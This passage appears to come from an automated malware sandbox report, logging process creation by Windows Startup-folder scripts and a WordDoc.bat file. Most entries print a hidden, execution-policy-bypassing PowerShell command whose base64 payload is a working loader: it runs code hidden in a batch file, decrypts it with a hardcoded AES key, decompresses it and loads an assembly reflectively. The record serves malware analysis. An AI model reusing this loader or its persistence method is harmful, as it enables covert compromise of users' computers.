pOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\WordDoc.bat"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5T